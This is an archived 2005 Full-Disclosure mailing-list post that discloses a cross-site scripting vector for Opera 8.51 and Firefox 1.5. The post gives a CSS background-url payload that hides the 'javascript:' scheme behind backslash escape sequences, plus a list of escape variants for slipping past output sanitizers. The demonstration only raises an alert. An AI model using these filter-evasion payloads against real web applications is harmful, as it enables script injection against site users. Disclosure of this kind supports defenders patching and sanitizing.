[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Opera/8.51 Firefox/1.5 XSS attacking vector

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Opera/8.51 Firefox/1.5 XSS attacking vector
From: hoshikuzu stardust <st4rdust@xxxxxxxxx>
Date: Sat, 3 Dec 2005 01:15:31 +0900

Hello full-disclosure.

Sample:
<anytag
style="background:url(&quot;javascri\Dpt:/*/**/(function a()
{alert('JavaScript is executed.')})();&quot;);"
/>

Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`.
( Tested on Windows XP servicepack2. )

Variant:
"\d"
"\D"
"\0d"
"\00000d"
"\d "
"\00000d "
"\a"
"\9"
e.t.c.
(Maybe we must checkout \7 via IE on Mac (a.k.a. BELL on Mac. ),
I do not have Mac.

If your web application does not sanitize output it is very easy to
inject malicious
scripts.

Is it well-known information ? ,sorry.

BEST REGARDS.

--
hoshikuzu | star_dust
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] 22nd CCC conference in Berlin
Next by Date: RE: [Full-disclosure] Software Firewalls for Windows
Previous by thread: [Full-disclosure] 22nd CCC conference in Berlin
Next by thread: [Full-disclosure] FW: [MailServer Notification] Your .zip file has been blocked from entering the ScanSoft email environment.
Index(es):
- Date
- Thread